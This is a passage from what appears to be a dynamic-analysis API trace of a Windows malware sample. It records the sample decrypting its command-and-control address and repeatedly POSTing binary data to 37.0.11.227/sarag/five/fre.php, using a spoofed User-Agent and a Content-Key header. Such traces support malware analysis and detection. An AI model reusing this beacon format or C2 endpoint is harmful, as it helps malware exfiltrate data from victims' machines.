sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0334.467] GetProcessHeap () returned 0x690000 [0334.467] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0334.468] socket (af=2, type=1, protocol=6) returned 0xbd4 [0334.468] connect (s=0xbd4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0334.493] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0334.493] GetProcessHeap () returned 0x690000 [0334.493] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0334.493] GetProcessHeap () returned 0x690000 [0334.493] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0334.494] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0334.495] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0334.495] GetProcessHeap () returned 0x690000 [0334.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0334.495] GetProcessHeap () returned 0x690000 [0334.495] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0334.495] GetProcessHeap () returned 0x690000 [0334.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0334.495] GetProcessHeap () returned 0x690000 [0334.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0334.496] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0334.497] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0334.497] GetProcessHeap () returned 0x690000 [0334.497] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0334.497] GetProcessHeap () returned 0x690000 [0334.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0334.497] send (s=0xbd4, buf=0x6ad508*, len=242, flags=0) returned 242 [0334.498] send (s=0xbd4, buf=0x6aba40*, len=159, flags=0) returned 159 [0334.498] GetProcessHeap () returned 0x690000 [0334.498] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0334.498] recv (in: s=0xbd4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0334.588] GetProcessHeap () returned 0x690000 [0334.589] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0334.589] GetProcessHeap () returned 0x690000 [0334.589] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0334.589] GetProcessHeap () returned 0x690000 [0334.589] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0334.590] GetProcessHeap () returned 0x690000 [0334.590] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0334.590] closesocket (s=0xbd4) returned 0 [0334.591] GetProcessHeap () returned 0x690000 [0334.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0334.591] GetProcessHeap () returned 0x690000 [0334.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0334.592] GetProcessHeap () returned 0x690000 [0334.592] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0334.592] GetProcessHeap () returned 0x690000 [0334.592] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0334.659] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1920) returned 0xbd4 [0334.662] Sleep (dwMilliseconds=0xea60) [0334.664] GetProcessHeap () returned 0x690000 [0334.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0334.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.665] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0334.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.678] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0334.687] GetProcessHeap () returned 0x690000 [0334.687] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0334.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.689] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0334.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.690] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0334.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.690] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0334.691] GetProcessHeap () returned 0x690000 [0334.691] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0334.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.692] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0334.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.693] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0334.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.696] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0334.696] GetProcessHeap () returned 0x690000 [0334.696] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0334.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.697] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0334.698] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.698] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0334.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.699] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0334.700] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.700] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0334.700] GetProcessHeap () returned 0x690000 [0334.700] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0334.700] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0334.701] GetProcessHeap () returned 0x690000 [0334.701] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0334.701] GetProcessHeap () returned 0x690000 [0334.701] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0334.701] GetProcessHeap () returned 0x690000 [0334.702] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0334.702] GetProcessHeap () returned 0x690000 [0334.702] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0334.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.703] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0334.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.710] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0334.727] GetProcessHeap () returned 0x690000 [0334.727] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0334.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.728] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0334.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.729] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0334.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.730] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0334.730] GetProcessHeap () returned 0x690000 [0334.731] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0334.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.732] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0334.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.732] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0334.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.733] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0334.733] GetProcessHeap () returned 0x690000 [0334.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0334.734] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.734] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0334.735] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.735] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0334.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.736] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0334.737] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.737] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0334.737] GetProcessHeap () returned 0x690000 [0334.737] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0334.737] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0334.737] GetProcessHeap () returned 0x690000 [0334.737] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0334.737] socket (af=2, type=1, protocol=6) returned 0xbd8 [0334.740] connect (s=0xbd8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0334.764] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0334.764] GetProcessHeap () returned 0x690000 [0334.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0334.764] GetProcessHeap () returned 0x690000 [0334.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0334.765] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0334.766] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0334.766] GetProcessHeap () returned 0x690000 [0334.766] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0334.766] GetProcessHeap () returned 0x690000 [0334.766] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0334.766] GetProcessHeap () returned 0x690000 [0334.766] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0334.767] GetProcessHeap () returned 0x690000 [0334.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0334.767] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0334.768] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0334.768] GetProcessHeap () returned 0x690000 [0334.768] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0334.768] GetProcessHeap () returned 0x690000 [0334.768] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0334.768] send (s=0xbd8, buf=0x6ad508*, len=242, flags=0) returned 242 [0334.769] send (s=0xbd8, buf=0x6aba40*, len=159, flags=0) returned 159 [0334.769] GetProcessHeap () returned 0x690000 [0334.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0334.769] recv (in: s=0xbd8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0334.845] GetProcessHeap () returned 0x690000 [0334.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0334.846] GetProcessHeap () returned 0x690000 [0334.847] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0334.847] GetProcessHeap () returned 0x690000 [0334.849] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0334.849] GetProcessHeap () returned 0x690000 [0334.849] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0334.849] closesocket (s=0xbd8) returned 0 [0334.851] GetProcessHeap () returned 0x690000 [0334.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0334.851] GetProcessHeap () returned 0x690000 [0334.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0334.851] GetProcessHeap () returned 0x690000 [0334.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0334.851] GetProcessHeap () returned 0x690000 [0334.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0334.852] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1924) returned 0xbd8 [0334.853] Sleep (dwMilliseconds=0xea60) [0334.855] GetProcessHeap () returned 0x690000 [0334.855] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0334.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.856] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0334.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.864] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0334.873] GetProcessHeap () returned 0x690000 [0334.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0334.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.874] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0334.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.875] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0334.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.876] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0334.876] GetProcessHeap () returned 0x690000 [0334.877] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0334.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.879] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0334.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.882] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0334.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.883] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0334.883] GetProcessHeap () returned 0x690000 [0334.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0334.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.884] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0334.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.885] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0334.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.886] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0334.887] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.887] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0334.887] GetProcessHeap () returned 0x690000 [0334.887] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0334.887] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0334.888] GetProcessHeap () returned 0x690000 [0334.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0334.893] GetProcessHeap () returned 0x690000 [0334.894] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0334.894] GetProcessHeap () returned 0x690000 [0334.894] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0334.894] GetProcessHeap () returned 0x690000 [0334.894] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0334.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.895] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0334.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.900] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0334.909] GetProcessHeap () returned 0x690000 [0334.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0334.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.911] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0334.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.912] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0334.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.913] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0334.913] GetProcessHeap () returned 0x690000 [0334.913] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0334.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.914] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0334.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.917] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0334.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.918] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0334.918] GetProcessHeap () returned 0x690000 [0334.918] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0334.919] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.919] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0334.919] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.920] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0334.920] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.920] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0334.921] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.921] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0334.921] GetProcessHeap () returned 0x690000 [0334.921] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0334.921] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0334.922] GetProcessHeap () returned 0x690000 [0334.922] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0334.922] socket (af=2, type=1, protocol=6) returned 0xbdc [0334.922] connect (s=0xbdc, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0334.950] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0334.950] GetProcessHeap () returned 0x690000 [0334.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0334.950] GetProcessHeap () returned 0x690000 [0334.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0334.951] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0334.951] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php 